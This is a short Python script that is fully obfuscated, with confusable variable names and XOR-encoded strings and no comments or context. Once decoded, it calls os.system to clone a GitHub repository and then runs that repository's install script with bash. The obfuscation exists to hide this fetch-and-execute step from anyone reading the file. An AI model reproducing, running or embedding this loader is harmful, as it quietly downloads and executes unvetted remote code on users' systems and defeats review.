l10l0101OOl0lO1O0llOl = (lambda O001l10000O11lOlOO0l0,
    l0lllll01O1l10l101lO0: O001l10000O11lOlOO0l0 ^ l0lllll01O1l10l101lO0)
lOOO11O00O01O0O11O0Ol = __import__(''.join(chr(O0lOl1OOl1OlO0l0lO0lO ^
    ll1lO0O011OOOlllll01l) for ll1lO0O011OOOlllll01l, O0lOl1OOl1OlO0l0lO0lO in
    zip(b'?\xea', b'M\x8f')), globals(), locals(), [], 0)
O01110O1ll010O110ll0l = __import__(''.join(chr(O00OlOll0111O1l001111 ^
    lOlO11l0l1O1OlO110O0O) for lOlO11l0l1O1OlO110O0O, O00OlOll0111O1l001111 in
    zip(b'\xd1\xe8', b'\xbe\x9b')), globals(), locals(), [], 0 * 8 + 0)
getattr(O01110O1ll010O110ll0l, ''.join(chr(llOO1Ol1O011Ol1OlO1Ol ^
    lOl0O1Ol11l0OOlll00l0) for lOl0O1Ol11l0OOlll00l0, llOO1Ol1O011Ol1OlO1Ol in
    zip(b'\x08\xbbF\xf2\xaf\t', b'{\xc25\x86\xcad')))(''.join(chr(
    Ol1l110O0l0lO0O101O1l ^ OO0O1Ol0l1l01101100Ol) for 
    OO0O1Ol0l1l01101100Ol, Ol1l110O0l0lO0O101O1l in zip(
    b'\xcb\xa54\x85\x1f\xf3\xd7\xe9q\xbd\xb2\xfcw\x7f\xeeD\x9e\xdf\xe5\x1b\x14\xcd\xb6\xe3\x0bI^\x14zY\x1e\xba\xffR CEa\xefM\xf2\x19\xa7\x8fwR\xaag)'
    ,
    b'\xac\xcc@\xa5|\x9f\xb8\x87\x14\x9d\xda\x88\x03\x0f\x9d~\xb1\xf0\x82r`\xa5\xc3\x81%*1yU\x14w\xd4\x973S *\x05\x8b~\x806\x89\xe6\x194\xcf\x04]'
    )))
getattr(O01110O1ll010O110ll0l, ''.join(chr(O0111O1l1O0OO1OO1l01l ^
    Ol01l1llOl0OOO1l01101) for Ol01l1llOl0OOO1l01101, O0111O1l1O0OO1OO1l01l in
    zip(b'\xb6eT\xbe\xf9\xf9', b"\xc5\x1c'\xca\x9c\x94")))(''.join(chr(
    l10llll10OOO01O10O101 ^ OO0011l10l1111O10l00l) for 
    OO0011l10l1111O10l00l, l10llll10OOO01O10O101 in zip(
    b'\xd7wj\xe5{\x98\x9f\x94<"\x9f\xea[\xd6-\\\xa1\xb0\xa5p8\x87r\xd1\xbc\xc5\xef\xac\xf3'
    ,
    b'\xbf\x04D\x89\x17\xf9\xeb\xe7RK\xbf\x82(\xb7O|\x87\x96\x85\x04[\xe2\x14\xbf\xd5\xeb\xcf\xc8\x90'
    ))[::-1 ^ 0])
